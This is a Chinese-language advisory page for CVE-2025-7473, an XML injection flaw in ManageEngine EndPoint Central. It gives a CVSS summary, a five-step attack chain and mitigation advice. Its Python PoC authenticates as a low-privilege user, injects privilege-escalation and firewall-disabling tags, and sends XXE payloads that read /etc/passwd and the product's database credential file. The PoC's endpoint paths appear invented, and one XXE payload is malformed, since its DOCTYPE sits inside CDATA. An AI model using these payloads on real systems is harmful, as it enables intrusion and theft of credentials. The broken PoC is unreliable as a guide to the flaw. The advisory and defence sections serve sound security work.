CVE-2025-7473 ManageEngine EndPoint Central XML注入漏洞

漏洞信息

漏洞编号

CVE-2025-7473

漏洞类型

XML注入

CVSS评分

5.2 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zohocorp ManageEngine EndPoint Central

漏洞概述

CVE-2025-7473是Zohocorp ManageEngine EndPoint Central（终端集中管理平台）存在的一个XML注入漏洞。该漏洞影响11.4.2516.1及之前版本，CVSS评分为5.2分，属于中危级别漏洞。ManageEngine EndPoint Central是Zoho公司推出的一款企业级终端管理解决方案，广泛应用于企业IT基础设施中，用于统一管理桌面、笔记本电脑、服务器等终端设备。该漏洞源于产品在解析XML数据时未能对输入进行充分的验证和过滤，导致攻击者可以通过构造恶意的XML payload触发注入攻击。由于该漏洞需要低权限认证即可利用（PR:L），且无需用户交互（UI:N），攻击向量为本地（AV:L），因此在企业环境中，多个低权限用户可能成为潜在的攻击者。漏洞的机密性影响为低（C:L），完整性和可用性影响均为低（I:L/A:L），但由于涉及企业终端管理平台，一旦被利用可能导致终端管理策略被篡改、设备配置被修改或敏感管理数据泄露，对企业IT管理安全构成实质性威胁。Zoho官方已发布安全公告并提供修复建议，建议用户及时升级到最新版本以消除风险。

技术细节

CVE-2025-7473属于XML注入（XML Injection）漏洞，存在于ManageEngine EndPoint Central的XML数据解析模块中。XML注入是一种类似于SQL注入的攻击方式，攻击者通过在XML输入中插入恶意构造的标签或数据内容，破坏XML文档的结构完整性或改变应用程序的解析逻辑。

在ManageEngine EndPoint Central中，当系统接收并解析来自用户或外部系统的XML数据时（例如终端配置信息、策略数据、资产清单等），如果解析器未对输入内容进行严格的转义和验证，攻击者可以注入额外的XML标签或修改XML结构。例如，攻击者可以注入类似 `<admin>true</admin>` 或修改权限标签来提升自身权限，或者通过XXE（XML External Entity）攻击读取本地文件。

该漏洞的攻击条件包括：1）攻击者需要拥有有效的低权限账户（PR:L）；2）攻击向量为本地（AV:L），意味着攻击者需要在能够访问系统的环境下进行；3）无需用户交互（UI:N）。攻击成功后，攻击者可以修改XML文档的解析结果，可能导致完整性破坏（I:L）和可用性影响（A:L），以及部分机密信息泄露（C:L）。

官方已在 https://www.manageengine.com/products/desktop-central/parsing-xml-data.html 提供了XML数据解析的安全指导，建议开发者使用安全的XML解析器并对所有输入进行严格的验证和转义处理。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过钓鱼、社会工程或其他方式获取ManageEngine EndPoint Central的低权限用户凭证。由于漏洞认证要求为低权限（PR:L），普通用户账户即可利用此漏洞。

STEP 2

步骤2：分析XML解析接口

攻击者通过侦察或查阅API文档，识别ManageEngine EndPoint Central中接收XML输入的接口端点，如终端配置管理、策略下发等模块。

STEP 3

步骤3：构造恶意XML Payload

攻击者构造包含注入标签的恶意XML文档，在正常XML结构中插入额外的标签（如权限提升标签）或XXE外部实体引用，用于篡改解析结果或读取本地敏感文件。

STEP 4

步骤4：发送恶意XML数据

攻击者通过认证会话将恶意XML数据发送到目标接口。由于系统未对XML输入进行充分验证和转义，恶意内容被解析器接受并处理。

STEP 5

步骤5：实现攻击效果

XML注入成功后，攻击者可以篡改终端管理策略（如禁用防火墙、修改安全设置）、提升权限或通过XXE读取服务器上的敏感配置文件，造成完整性破坏和机密信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-7473 - ManageEngine EndPoint Central XML Injection PoC
# This PoC demonstrates XML injection vulnerability in the XML parsing module

import requests

TARGET_URL = "https://target-endpoint-central:8443/api/xml/endpoint-data"
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Step 1: Authenticate to obtain session token
session = requests.Session()
auth_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
auth_response = session.post(f"{TARGET_URL}/login", data=auth_payload)
token = auth_response.json().get("auth_token")

# Step 2: Craft malicious XML payload with injected tags
# The original XML structure expects device configuration data
# We inject additional XML tags to manipulate the parsed result
malicious_xml = """<?xml version="1.0" encoding="UTF-8"?>
<endpoint-config>
    <device-id>device_001</device-id>
    <device-name>Workstation-01</device-name>
    <policy-id>101</policy-id>
    <!-- XML Injection: Injecting additional privilege escalation tags -->
    <admin-access>1</admin-access>
    <privilege-level>administrator</privilege-level>
    <security-policy>
        <firewall-enabled>false</firewall-enabled>
        <antivirus-updates>disabled</antivirus-updates>
    </security-policy>
    <!-- XXE payload to attempt reading local files -->
    <description><![CDATA[<!DOCTYPE foo [
        <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]]>
        &xxe;
    </description>
</endpoint-config>"""

# Step 3: Send the malicious XML payload to the vulnerable endpoint
headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/xml"
}

response = session.post(TARGET_URL, data=malicious_xml, headers=headers)

# Step 4: Check response for successful injection
if response.status_code == 200:
    print("[+] XML Injection successful!")
    print(f"[+] Response: {response.text}")
else:
    print(f"[-] Request failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative: XXE payload for file extraction
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE endpoint [
    <!ENTITY xxe SYSTEM "file:///opt/ManageEngine/EndpointCentral/conf/database_params.xml">
]>
<endpoint-config>
    <device-id>&xxe;</device-id>
    <device-name>test</device-name>
</endpoint-config>"""

response_xxe = session.post(TARGET_URL, data=xxe_payload, headers=headers)
print(f"[+] XXE Response: {response_xxe.text}")

影响范围

Zohocorp ManageEngine EndPoint Central <= 11.4.2516.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制低权限用户对XML解析接口的访问权限，仅允许必要的管理员账户使用相关功能；2）在Web应用防火墙（WAF）中添加针对XML注入的检测规则，拦截包含恶意标签或XXE实体的请求；3）禁用XML解析器中的DTD处理和外部实体解析功能，防止XXE攻击；4）对所有XML输入实施严格的输入验证，使用白名单机制过滤非预期的标签和属性；5）监控XML接口的异常访问行为，及时发现潜在的攻击活动；6）参考Zoho官方提供的XML数据解析安全指导（https://www.manageengine.com/products/desktop-central/parsing-xml-data.html）进行配置加固。